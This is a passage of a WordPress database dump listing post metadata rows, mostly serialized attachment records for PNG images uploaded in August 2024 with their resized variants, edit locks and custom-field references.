8;s:6:\"height\";i:1085;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1009120;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"3-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:129781;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1156,376,'_thumbnail_id','377'),
(1157,376,'_edit_last','1'),
(1159,376,'title_style','default'),
(1160,376,'_title_style','field_5d1a0217cf408'),
(1161,378,'title_style','default'),
(1162,378,'_title_style','field_5d1a0217cf408'),
(1163,379,'_edit_lock','1722519021:1'),
(1164,380,'_wp_attached_file','2024/08/1.png'),
(1165,380,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:13:\"2024/08/1.png\";s:8:\"filesize\";i:3889367;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:111543;}s:5:\"large\";a:5:{s:4:\"file\";s:14:\"1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:972290;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41702;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1088030;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:15:\"1-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2010020;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:13:\"1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:85039;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1167,379,'_thumbnail_id','380'),
(1168,379,'_edit_last','1'),
(1169,379,'title_style','default'),
(1170,379,'_title_style','field_5d1a0217cf408'),
(1171,379,'related',''),
(1172,379,'_related','field_603b51c3e183e'),
(1173,381,'title_style','default'),
(1174,381,'_title_style','field_5d1a0217cf408'),
(1175,381,'related',''),
(1176,381,'_related','field_603b51c3e183e'),
(1179,376,'related',''),
(1180,376,'_related','field_603b51c3e183e'),
(1181,378,'related',''),
(1182,378,'_related','field_603b51c3e183e'),
(1185,373,'related',''),
(1186,373,'_related','field_603b51c3e183e'),
(1187,375,'related',''),
(1188,375,'_related','field_603b51c3e183e'),
(1190,383,'_edit_lock','1722519169:1'),
(1191,384,'_wp_attached_file','2024/08/2.png'),
(1192,384,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:13:\"2024/08/2.png\";s:8:\"filesize\";i:2499182;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"2-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:93751;}s:5:\"large\";a:5:{s:4:\"file\";s:14:\"2-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:726277;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37845;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"2-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:813524;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:15:\"2-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1507513;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:13:\"2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79349;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1194,383,'_edit_last','1'),
(1196,383,'title_style','default'),
(1197,383,'_title_style','field_5d1a0217cf408'),
(1198,383,'related',''),
(1199,383,'_related','field_603b51c3e183e'),
(1200,385,'title_style','default'),
(1201,385,'_title_style','field_5d1a0217cf408'),
(1202,385,'related',''),
(1203,385,'_related','field_603b51c3e183e'),
(1204,386,'_edit_lock','1722519237:1'),
(1205,387,'_wp_attached_file','2024/08/5-67.png'),
(1206,387,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2024/08/5-67.png\";s:8:\"filesize\";i:2645486;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"5-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88213;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"5-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:755118;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"5-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36357;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"5-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:851461;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"5-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1629475;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"5-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95802;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1208,386,'_thumbnail_id','387'),
(1209,386,'_edit_last','1'),
(1211,386,'title_style','default'),
(1212,386,'_title_style','field_5d1a0217cf408'),
(1213,386,'related',''),
(1214,386,'_related','field_603b51c3e183e'),
(1215,388,'title_style','default'),
(1216,388,'_title_style','field_5d1a0217cf408'),
(1217,388,'related',''),
(1218,388,'_related','field_603b51c3e183e'),
(1219,389,'_edit_lock','1722519307:1'),
(1220,390,'_wp_attached_file','2024/08/7-67.png'),
(1221,390,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2024/08/7-67.png\";s:8:\"filesize\";i:2439865;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"7-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91215;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"7-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:718336;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"7-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36610;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"7-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:807635;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"7-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1505922;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"7-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:89481;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1223,389,'_thumbnail_id','390'),
(1224,389,'_edit_last','1'),
(1226,389,'title_style','default'),
(1227,389,'_title_style','field_5d1a0217cf408'),
(1228,389,'related',''),
(1229,389,'_related','field_603b51c3e183e'),
(1230,391,'title_style','default'),
(1231,391,'_title_style','field_5d1a0217cf408'),
(1232,391,'related',''),
(1233,391,'_related','field_603b51c3e183e'),
(1234,392,'_edit_lock','1722519363:1'),
(1235,393,'_wp_attached_file','2024/08/8-67.png'),
(1236,393,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2024/08/8-67.png\";s:8:\"filesize\";i:2613518;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"8-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:89259;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"8-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:749589;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"8-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37108;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"8-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:844905;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"8-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1589326;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"8-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:93282;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1238,392,'_thumbnail_id','393'),
(1239,392,'_edit_last','1'),
(1241,392,'title_style','default'),
(1242,392,'_title_style','field_5d1a0217cf408'),
(1243,392,'related',''),
(1244,392,'_related','field_603b51c3e183e'),
(1245,394,'title_style','default'),
(1246,394,'_title_style','field_5d1a0217cf408'),
(1247,394,'related',''),
(1248,394,'_related','field_603b51c3e183e'),
(1249,395,'_edit_lock','1722519416:1'),
(1250,396,'_wp_attached_file','2024/08/9-67.png'),
(1251,396,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2024/08/9-67.png\";s:8:\"filesize\";i:3419660;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"9-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99403;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"9-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:834437;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"9-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42151;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"9-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:937995;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"9-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1763590;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"9-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101965;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1253,395,'_thumbnail_id','396'),
(1254,395,'_edit_last','1'),
(1255,395,'title_style','default'),
(1256,395,'_title_style','field_5d1a0217cf408'),
(1257,395,'related',''),
(1258,395,'_related','field_603b51c3e183e'),
(1259,397,'title_style','default'),
(1260,397,'_title_style','field_5d1a0217cf408'),
(1261,397,'related',''),
(1262,397,'_related','field_603b51c3e183e'),
(1263,398,'_edit_lock','1722519490:1'),
(1264,399,'_wp_attached_file','2024/08/10-67.png'),
(1265,399,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/10-67.png\";s:8:\"filesize\";i:2874473;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"10-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:96491;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"10-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:770268;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"10-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42806;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"10-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:850327;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"10-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1521783;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"10-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99476;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1266,400,'_wp_attached_file','2024/08/10-67-1.png'),
(1267,400,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:19:\"2024/08/10-67-1.png\";s:8:\"filesize\";i:2874473;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"10-67-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:96491;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"10-67-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:770268;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"10-67-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42806;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"10-67-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:850327;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"10-67-1-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1521783;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"10-67-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99476;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1269,398,'_thumbnail_id','399'),
(1270,398,'_edit_last','1'),
(1272,398,'title_style','default'),
(1273,398,'_title_style','field_5d1a0217cf408'),
(1274,398,'related',''),
(1275,398,'_related','field_603b51c3e183e'),
(1276,401,'title_style','default'),
(1277,401,'_title_style','field_5d1a0217cf408'),
(1278,401,'related',''),
(1279,401,'_related','field_603b51c3e183e'),
(1280,402,'_edit_lock','1722519543:1'),
(1281,403,'_wp_attached_file','2024/08/11-67.png'),
(1282,403,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/11-67.png\";s:8:\"filesize\";i:2801376;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"11-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:97983;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"11-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:771499;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"11-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43519;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"11-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:850622;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"11-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1507627;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"11-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99002;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1284,402,'_thumbnail_id','403'),
(1285,402,'_edit_last','1'),
(1286,402,'title_style','default'),
(1287,402,'_title_style','field_5d1a0217cf408'),
(1288,402,'related',''),
(1289,402,'_related','field_603b51c3e183e'),
(1290,404,'title_style','default'),
(1291,404,'_title_style','field_5d1a0217cf408'),
(1292,404,'related',''),
(1293,404,'_related','field_603b51c3e183e'),
(1294,405,'_edit_lock','1722519610:1'),
(1295,406,'_wp_attached_file','2024/08/12-2567.png'),
(1296,406,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:19:\"2024/08/12-2567.png\";s:8:\"filesize\";i:1094696;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"12-2567-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79488;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"12-2567-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:498806;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"12-2567-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33408;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"12-2567-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:550918;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"12-2567-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:932766;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"12-2567-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69509;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1298,405,'_thumbnail_id','406'),
(1299,405,'_edit_last','1'),
(1301,405,'title_style','default'),
(1302,405,'_title_style','field_5d1a0217cf408'),
(1303,405,'related',''),
(1304,405,'_related','field_603b51c3e183e'),
(1305,407,'title_style','default'),
(1306,407,'_title_style','field_5d1a0217cf408'),
(1307,407,'related',''),
(1308,407,'_related','field_603b51c3e183e'),
(1309,408,'_edit_lock','1722519674:1'),
(1310,409,'_wp_attached_file','2024/08/13-2567.png'),
(1311,409,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:19:\"2024/08/13-2567.png\";s:8:\"filesize\";i:987345;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"13-2567-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69195;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"13-2567-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:438242;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"13-2567-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29471;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"13-2567-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:483289;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"13-2567-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:822825;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"13-2567-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:63440;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1313,408,'_thumbnail_id','409'),
(1314,408,'_edit_last','1'),
(1315,408,'title_style','default'),
(1316,408,'_title_style','field_5d1a0217cf408'),
(1317,408,'related',''),
(1318,408,'_related','field_603b51c3e183e'),
(1319,410,'title_style','default'),
(1320,410,'_title_style','field_5d1a0217cf408'),
(1321,410,'related',''),
(1322,410,'_related','field_603b51c3e183e'),
(1323,411,'_edit_lock','1722519742:1'),
(1324,412,'_wp_attached_file','2024/08/14-67.png'),
(1325,412,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/14-67.png\";s:8:\"filesize\";i:2857093;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"14-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98022;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"14-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:821207;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"14-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40713;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"14-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:108